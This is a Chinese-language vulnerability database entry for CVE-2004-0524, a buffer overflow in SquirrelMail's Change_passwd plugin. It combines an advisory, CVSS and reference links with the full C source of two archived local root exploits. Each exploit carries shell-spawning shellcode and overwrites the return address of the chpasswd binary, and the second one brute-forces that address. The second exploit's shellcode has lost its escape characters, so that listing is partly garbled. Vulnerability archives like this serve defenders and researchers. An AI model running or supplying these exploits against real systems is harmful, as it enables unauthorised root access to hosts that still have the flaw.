CVE-2004-0524
CVSS10.0
发布时间 :2004-08-06 00:00:00
修订时间 :2016-10-17 22:45:55
NMCOES    

[原文]Buffer overflow in the chpasswd command in the Change_passwd plugin before 4.0, as used in SquirrelMail, allows local users to gain root privileges via a long user name.


[CNNVD]SquirrelMail Change_Passwd插件远程缓冲区溢出漏洞(CNNVD-200408-038)

        
        SquirrelMail change_passwd plug-in是基于WEB的SquirrelMail更改密码插件。
        SquirrelMail change_passwd插件存在基于堆栈的缓冲区溢出,本地或远程攻击者利用这个漏洞可以提升权限或未授权访问。
        Change_passwd插件包含的chpasswd对提交的参数缺少充分检查,攻击者提交超长参数可触发缓冲区溢出,攻击者要利用这个漏洞,必须是Webmaster或www或其他相关软件定义的用户组成员才能访问。
        此漏洞也可以通过CGI接口来利用。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0524
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0524
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200408-038
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=108222863917958&w=2
(UNKNOWN)  BUGTRAQ  20040417 Squirrelmail Chpasswod bof
http://marc.info/?l=bugtraq&m=108311782032370&w=2
(UNKNOWN)  BUGTRAQ  20040427 Re: Squirrelmail Chpasswod bof
http://www.securityfocus.com/bid/10166
(VENDOR_ADVISORY)  BID  10166
http://www.squirrelmail.org/plugin_view.php?id=117
(UNKNOWN)  CONFIRM  http://www.squirrelmail.org/plugin_view.php?id=117
http://xforce.iss.net/xforce/xfdb/15889
(VENDOR_ADVISORY)  XF  squirrelmail-chpasswd-binary-bo(15889)

- 漏洞信息

SquirrelMail Change_Passwd插件远程缓冲区溢出漏洞
危急 边界条件错误
2004-08-06 00:00:00 2006-08-28 00:00:00
远程※本地  
        
        SquirrelMail change_passwd plug-in是基于WEB的SquirrelMail更改密码插件。
        SquirrelMail change_passwd插件存在基于堆栈的缓冲区溢出,本地或远程攻击者利用这个漏洞可以提升权限或未授权访问。
        Change_passwd插件包含的chpasswd对提交的参数缺少充分检查,攻击者提交超长参数可触发缓冲区溢出,攻击者要利用这个漏洞,必须是Webmaster或www或其他相关软件定义的用户组成员才能访问。
        此漏洞也可以通过CGI接口来利用。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 可采用如下第三方补丁:
        
        http://www.securityfocus.com/data/vulnerabilities/patches/chpasswd-fix.c

        厂商补丁:
        SquirrelMail
        ------------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.squirrelmail.org

- 漏洞信息 (273)

SquirrelMail chpasswd buffer overflow (EDBID:273)
linux local
2004-04-20 Verified
0 x314
N/A [点击下载]
/*
* 0x3142-sq-chpasswd.c
* Squirremail chpasswd buffer overflow.
*
* Tested on SuSE 9.
* The bug was found by Matias Neiff <matias neiff com ar>
* Coded by x314 <0x3142 hushmail.com>
* (c) 2004 Copyright by x314.
* All Rights Reserved.
*
* Greets: m0s krewz. 
*
*/

#include <stdlib.h>

char shellcode[]=
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68";

int main(int argc, char *argv[])
{
char *env[2] = {shellcode, NULL};
int i;
long ret, *addr_ptr;
char *buffer, *ptr;

buffer = malloc(200);

printf("\n*** Squirremail chpasswd local root exploit by 0x3142@hushmail.com ***\n\n");

if(argc != 2) {
printf("Usage: %s <path-to-chpasswd>\n\n",argv[0]);
exit(0);
}

ret = 0xbffffffa - strlen(shellcode) - strlen(argv[1]);

// printf("Using ret = 0x%x\n\n", ret);

ptr = buffer;
addr_ptr = (long *) ptr;
for(i=0; i < 200; i+=4)
{
*(addr_ptr++) = ret;
}

buffer[200-1] = 0;

execle(argv[1], "chpasswd", buffer, "0x314", "m0s", 0, env);

free(buffer);

return 0;
}




// milw0rm.com [2004-04-20]
		

- 漏洞信息 (417)

SquirrelMail (chpasswd) Local Root Bruteforce Exploit (EDBID:417)
linux local
2004-08-25 Verified
0 Bytes
N/A [点击下载]
/* 

** PST_chpasswd_exp-v_b.c: 
** 
** Squirrelmail chpasswd local root bruteforce exploit 
** Author: 
** Bytes<Bytes[at]ph4nt0m.net> || <Bytes[at]ph4nt0m.org> 
** www ph4nt0m net 
** Notice: 
** v_b: Local bruteforce version 
** v_R: remote bruteforce version 
** 
** 
** Greatze: #ph4nt0m,#music@0x557 
** All PST member,Grip2,Airsupply,Jambalaya,Ann,Paul,Happy... 
** Thax: My GF(Luz),Oyxin,Winewind,Envymask,Eong,luoluo,GoGo(f0r ever)... 
** 
** 
** -=-=-=-=-=-=-=-=-=-= !!![+PH4NT0M TEAM PRIVATE EXPLOIT+]!!! =-=-=-=-=-=-=-=-=-=- 
** 
** Date: 2004-04 # DO NOT DISTRIBUTE # 
** 
** You Must get account belong to Webmaster ,www or other webserver groups. 
** 
*/ 

#include <stdio.h> 
#include <unistd.h> 
#include <stdlib.h> 
#include <sys/wait.h> 

#define NOP 0x90 
#define Fuckpr0 "./chpasswd" /* you need modify it by yourself */ 
#define LOOP 2000 /* loop of bruteforce */ 

/* setuid(0) shellcode by by Matias Sedalo 3x ^_^ */ 

char shellcode[] ="x31xdbx53x8dx43x17xcdx80x99x68x6ex2fx73x68x68" 
"x2fx2fx62x69x89xe3x50x53x89xe1xb0x0bxcdx80"; 

unsigned long get_esp() { 

__asm__ ("movl %esp,%eax"); 

} 

void *M_malloc(size_t size){ 

register void *value; 

value = malloc(size); 

if(value == NULL){ 

printf("ERROR:virtual memory exhausted...n"); 

exit(-1); 

} 

return value; 

} 

int main(void){ 

unsigned long ret_addr; 

int i,j=0,offset=2,status; 

char *buf1,*buf2; 

pid_t pid; 

ret_addr = get_esp() - strlen(Fuckpr0) - strlen(shellcode); 

printf("t-------------------------------------------------------n"); 
printf("t Squirrelmail chpasswd local root bruteforce exploit n"); 
printf("t code By Bytes<Bytes[at]ph4nt0m.org> 2004 n"); 
printf("t http://www.ph4nt0m.net n"); 
printf("t#######################################################n"); 


sleep(1); 

printf("[+] Bruteforce......nn"); 

sleep(2); 

buf1 = (char *)M_malloc(150); 

buf2 = (char *)M_malloc(600); 

while(j <= LOOP){ 

if((pid = fork()) == 0){ 

memset(buf2,0x90,sizeof(buf2) - strlen(shellcode) - 8); 

memcpy(buf2 + sizeof(buf2) - strlen(shellcode) - 8,shellcode,sizeof(shellcode)); 

for(i=0; i < 150; i+=4){ 

*((unsigned long *)(buf1+i)) = ret_addr; 

} 

printf("buf1 = %sn",buf1); 

execl(Fuckpr0,"chpasswd",buf1,buf2,0); 

} 

wait(&status); 

printf("[-] Signal: #%in", status); 

if(WIFEXITED(status) != 0 ) { 

printf("[=] Step.%i: 0x%xn[~] Exiting...n",(j/2),ret_addr); 

exit(1); 

}else{ 

ret_addr += offset; 

j += offset; 

printf("[=] Offset:%d Use ret:0x%xn",j, ret_addr); 

} 

} 

free(buf1); 

free(buf2); 

return 1; 

} 

// milw0rm.com [2004-08-25]
		

- 漏洞信息

5551
SquirrelMail Change_passwd Plugin Overflow
Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2004-04-17 Unknow
2004-04-19 Unknow

- 解决方案

Upgrade to version 4.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

SquirrelMail Change_Passwd Plug-in Buffer Overrun Vulnerability
Boundary Condition Error 10166
Yes Yes
2004-04-17 12:00:00 2009-07-12 04:06:00
Discovery is credited to Matias Neiff <matias@neiff.com.ar>.

- 受影响的程序版本

SquirrelMail change_passwd 3.1 -1.2.8

- 漏洞讨论

The SquirrelMail change_passwd plug-in is prone to a stack-based buffer overrun vulnerability. The issue exists in the backend chpasswd binary.

This vulnerability could potentially be exploited by a local user to execute arbitrary code as root.

It should be noted that the local user may need to have additional privileges to exploit this issue, such as being a member of a special group on the system, such as webmasters or www or to have access to a special user, depending on how the software is configured.

This issue may also be remotely exploitable via the CGI interface of the software.

- 漏洞利用

The following exploits have been released, an exploit consisting of two source files SPK-chpasswd.c and setegg.c has been supplied by SpikE VrM, a PERL based exploit moron.pl has been supplied by rip@overflow.no:

- 解决方案

The vendor has released an upgrade to address this issue:


SquirrelMail change_passwd 3.1 -1.2.8

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站